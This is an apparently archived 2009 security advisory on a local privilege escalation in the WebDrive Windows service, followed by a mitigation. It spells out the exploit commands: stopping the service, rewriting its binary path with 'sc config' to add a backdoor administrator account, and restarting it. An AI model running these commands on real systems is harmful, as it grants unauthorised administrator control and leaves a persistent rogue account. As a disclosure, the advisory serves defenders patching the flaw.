Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22662
HistoryOct 20, 2009 - 12:00 a.m.

South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges

2009-10-2000:00:00
vulners.com
16
JSON

South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Software site: http://www.webdrive.com/
Download location: http://www.webdrive.com/download/index.html

Tested against:
South River Technologies WebDrive 9.02 build 2232
on Microsoft Windows XP SP3

The "WebDrive Service" is installed with an empty security descriptor. A malicious user can
stop the service, then invoke the "sc config" command to replace the binary path with a value
of choice, then restart the service to run the command with SYSTEM privileges ex., run theese
commands as a limited user:

sc stop WebDriveService
sc config WebDriveService binPath= "cmd /c net user southriver kills /add && net localgroup Administrators southriver /add"
sc start WebDriveService
runas /noprofile /user:%COMPUTERNAME%\southriver cmd

now login as administrator with password "kills"

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow WebDriveService

D:

change the security descriptor like the following:

c:\sc sdset WebDriveService
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

original url: http://retrogod.altervista.org/9sg_south_river_priv.html

JSON